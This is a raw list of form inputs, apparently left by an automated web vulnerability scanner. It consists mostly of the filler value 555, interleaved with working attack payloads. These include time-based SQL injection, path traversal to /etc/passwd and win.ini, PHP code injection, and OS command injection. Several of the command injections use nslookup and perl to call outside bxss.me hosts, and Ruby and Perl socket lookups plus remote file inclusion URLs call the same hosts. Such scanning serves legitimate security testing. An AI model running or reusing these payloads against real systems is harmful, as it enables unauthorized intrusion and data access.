555
555
555
555
555
555
555
555
555
555
555
555
acu7359%EF%BC%9Cs1%EF%B9%A5s2%CA%BAs3%CA%B9uca7359
555
acux5366%C0%BEz1%C0%BCz2a%90bcxuca5366
555
<%={{={@{#{${acx}}%>
555
555
555
555
555
555
5559079832
5559560160
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
1'"
1
@@Gnexw
555*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
LmoXr3Hg')) OR 981=(SELECT 981 FROM PG_SLEEP(15))--
jcuWqGEA') OR 519=(SELECT 519 FROM PG_SLEEP(15))--
wXwfwvOx' OR 504=(SELECT 504 FROM PG_SLEEP(15))--
-1)) OR 504=(SELECT 504 FROM PG_SLEEP(15))--
-5) OR 247=(SELECT 247 FROM PG_SLEEP(15))--
-5 OR 158=(SELECT 158 FROM PG_SLEEP(15))--
gBv3VgqE'; waitfor delay '0:0:15' --
1 waitfor delay '0:0:15' --
-1); waitfor delay '0:0:15' --
-1; waitfor delay '0:0:15' --
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
if(now()=sysdate(),sleep(15),0)
-1' OR 2+39-39-1=0+0+0+1 or 'xs7agmTF'='
-1" OR 2+896-896-1=0+0+0+1 --
ybiGmcfp
-1 OR 2+250-250-1=0+0+0+1 --
-1 OR 2+316-316-1=0+0+0+1
-1' OR 2+181-181-1=0+0+0+1 --
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
../../../../../../../../../../../../../../etc/passwd
../../../../../../../../../../../../../../windows/win.ini
555
../555
555
555
555
555
555
555
555
555
555
555
555
555
";print(md5(31337));$a="
555
555
${@print(md5(31337))}
555
555
555
${@print(md5(31337))}\
555
555
'.print(md5(31337)).'
555
555
555
555
555
555
`(nslookup hitqzbzgqyyxdcdc60.bxss.me||perl -e "gethostbyname('hitqzbzgqyyxdcdc60.bxss.me')")`
555
555
;(nslookup hitkljnxypbch8f6b1.bxss.me||perl -e "gethostbyname('hitkljnxypbch8f6b1.bxss.me')")|(nslookup hitkljnxypbch8f6b1.bxss.me||perl -e "gethostbyname('hitkljnxypbch8f6b1.bxss.me')")&(nslookup hitkljnxypbch8f6b1.bxss.me||perl -e "gethostbyname('hitkljnxypbch8f6b1.bxss.me')")
555
555
555
555
555
555
555
555
555
555
555
555
;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));
555
555
';print(md5(31337));$a='
555
555
555
555
555
555
555
echo gmfgxm$()\ npibnf\nz^xyu||a #' &echo gmfgxm$()\ npibnf\nz^xyu||a #|" &echo gmfgxm$()\ npibnf\nz^xyu||a #
555
555
555
&echo hgzecp$()\ tqfwbv\nz^xyu||a #' &echo hgzecp$()\ tqfwbv\nz^xyu||a #|" &echo hgzecp$()\ tqfwbv\nz^xyu||a #
555
555
555
|echo oujbaw$()\ pwbdjd\nz^xyu||a #' |echo oujbaw$()\ pwbdjd\nz^xyu||a #|" |echo oujbaw$()\ pwbdjd\nz^xyu||a #
555
555
555
(nslookup hitdodptjwqbc015e0.bxss.me||perl -e "gethostbyname('hitdodptjwqbc015e0.bxss.me')")
555
555
555
&(nslookup hitjrhwsmdnuha24db.bxss.me||perl -e "gethostbyname('hitjrhwsmdnuha24db.bxss.me')")&'\"`0&(nslookup hitjrhwsmdnuha24db.bxss.me||perl -e "gethostbyname('hitjrhwsmdnuha24db.bxss.me')")&`'
555
555
|(nslookup hitqhjpkocfim5c826.bxss.me||perl -e "gethostbyname('hitqhjpkocfim5c826.bxss.me')")
555
555
555
555
555
555
555
555
555
555
555
http://some-inexistent-website.acu/some_inexistent_file_with_long_name%3F.jpg
555
555
555
555
1some_inexistent_file_with_long_name%00.jpg
555
555
555
Http://bxss.me/t/fit.txt
555
555
555
http://bxss.me/t/fit.txt%3F.jpg
555
555
bxss.me
555
'"()
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
1QsSvtMaO
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
HttP://bxss.me/t/xss.html?%00
555
555
"+"A".concat(70-3).concat(22*4).concat(100).concat(89).concat(114).concat(65)+(require"socket"
Socket.gethostbyname("hitlx"+"snurlfdqb9ccb.bxss.me.")[3].to_s)+"
!(()&&!|*|*|
555
555
'+'A'.concat(70-3).concat(22*4).concat(109).concat(82).concat(103).concat(76)+(require'socket'
Socket.gethostbyname('hitfs'+'cvjlrvswbb885.bxss.me.')[3].to_s)+'
555
555
555
555
^(#$!@#$)(()))******
555
".gethostbyname(lc("hitdi"."wnegifmk0408f.bxss.me."))."A".chr(67).chr(hex("58")).chr(114).chr(82).chr(116).chr(86)."
555
555
555
555
${9999949+9999815}
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))